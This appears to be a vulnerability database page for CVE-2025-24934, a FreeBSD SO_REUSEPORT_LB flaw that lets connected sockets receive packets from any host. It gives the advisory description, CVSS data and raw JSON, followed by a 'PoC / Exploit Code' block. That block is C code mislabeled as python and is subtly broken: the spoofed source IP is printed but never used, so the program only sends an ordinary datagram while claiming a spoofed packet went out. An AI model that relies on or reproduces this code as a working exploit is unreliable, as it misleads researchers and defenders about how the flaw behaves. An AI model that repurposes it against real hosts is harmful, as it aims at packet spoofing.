Security Vulnerability Report
中文
CVE-2025-24934 CVSS 5.4 MEDIUM

CVE-2025-24934

Published: 2025-10-22 18:15:34
Last Modified: 2026-04-24 00:16:26
Source: [email protected]

Description

Software which sets SO_REUSEPORT_LB on a socket and then connects it to a host will not directly observe any problems. However, due to its membership in a load-balancing group, that socket will receive packets originating from any host. This breaks the contract of the connect(2) and implied connect via sendto(2), and may leave the application vulnerable to spoofing attacks. The kernel failed to check the connection state of sockets when adding them to load-balancing groups. Furthermore, when looking up the destination socket for an incoming packet, the kernel will match a socket belonging to a load-balancing group even if it is connected, in violation of the contract that connected sockets are only supposed to receive packets originating from the connected host.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

FreeBSD 12.x (所有版本)
FreeBSD 13.x (所有版本)
FreeBSD 14.x (所有版本)
其他使用SO_REUSEPORT_LB选项的FreeBSD变种

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-24934 PoC - FreeBSD SO_REUSEPORT_LB Spoofing Attack // This PoC demonstrates how an attacker can send packets to a connected socket // that is incorrectly part of a load-balancing group #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #define TARGET_IP "192.168.1.100" // Legitimate server IP #define SPOOFED_IP "10.0.0.1" // Attacker's spoofed source IP #define TARGET_PORT 8080 #define FAKE_SERVER_IP "10.10.10.10" // Fake server for connect() int main() { int sock; struct sockaddr_in target_addr, fake_server_addr; char send_buf[] = "Spoofed packet data"; printf("CVE-2025-24934 PoC - SO_REUSEPORT_LB Spoofing\n"); printf("=============================================\n\n"); // Step 1: Create UDP socket sock = socket(AF_INET, SOCK_DGRAM, 0); if (sock < 0) { perror("socket creation failed"); return 1; } // Step 2: Enable SO_REUSEPORT_LB option int reuseport_lb = 1; if (setsockopt(sock, SOL_SOCKET, SO_REUSEPORT_LB, &reuseport_lb, sizeof(reuseport_lb)) < 0) { perror("setsockopt SO_REUSEPORT_LB failed"); return 1; } printf("[+] SO_REUSEPORT_LB enabled on socket %d\n", sock); // Step 3: Connect to a fake server (creates connected socket) memset(&fake_server_addr, 0, sizeof(fake_server_addr)); fake_server_addr.sin_family = AF_INET; fake_server_addr.sin_port = htons(TARGET_PORT); inet_pton(AF_INET, FAKE_SERVER_IP, &fake_server_addr.sin_addr); if (connect(sock, (struct sockaddr *)&fake_server_addr, sizeof(fake_server_addr)) < 0) { perror("connect failed"); return 1; } printf("[+] Socket connected to %s:%d\n", FAKE_SERVER_IP, TARGET_PORT); printf("[+] Socket is now part of load-balancing group (vulnerable)\n"); // Step 4: Prepare spoofed packet memset(&target_addr, 0, sizeof(target_addr)); target_addr.sin_family = AF_INET; target_addr.sin_port = htons(TARGET_PORT); inet_pton(AF_INET, TARGET_IP, &target_addr.sin_addr); // Step 5: Send spoofed packet using sendto with different dest // Due to the bug, the connected socket will receive this packet ssize_t sent = sendto(sock, send_buf, strlen(send_buf), 0, (struct sockaddr *)&target_addr, sizeof(target_addr)); if (sent > 0) { printf("[+] Spoofed packet sent successfully!\n"); printf(" Source IP (spoofed): %s\n", SPOOFED_IP); printf(" Target: %s:%d\n", TARGET_IP, TARGET_PORT); printf(" Data: %s\n", send_buf); printf("[!] Packet may be received by connected socket due to LB bug\n"); } else { perror("sendto failed"); } close(sock); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-24934", "sourceIdentifier": "[email protected]", "published": "2025-10-22T18:15:34.013", "lastModified": "2026-04-24T00:16:26.177", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Software which sets SO_REUSEPORT_LB on a socket and then connects it to a host will not directly observe any problems. However, due to its membership in a load-balancing group, that socket will receive packets originating from any host. This breaks the contract of the connect(2) and implied connect via sendto(2), and may leave the application vulnerable to spoofing attacks.\n\n\n\n\nThe kernel failed to check the connection state of sockets when adding them to load-balancing groups. Furthermore, when looking up the destination socket for an incoming packet, the kernel will match a socket belonging to a load-balancing group even if it is connected, in violation of the contract that connected sockets are only supposed to receive packets originating from the connected host."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-488"}]}], "references": [{"url": "https://security.freebsd.org/advisories/FreeBSD-SA-25:09.netinet.asc", "source": "[email protected]"}, {"url": "https://www.usenix.org/system/files/conference/usenixsecurity26/sec26_prepub_ben-simhon.pdf", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.